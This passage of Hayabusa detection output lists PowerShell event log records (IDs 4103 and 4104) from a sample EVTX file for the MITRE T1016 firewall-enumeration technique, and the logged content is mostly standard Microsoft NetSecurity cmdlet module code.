name=""Function""; value=""Get-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) 
} } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallPortFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) 
{ $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) 
$__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] 
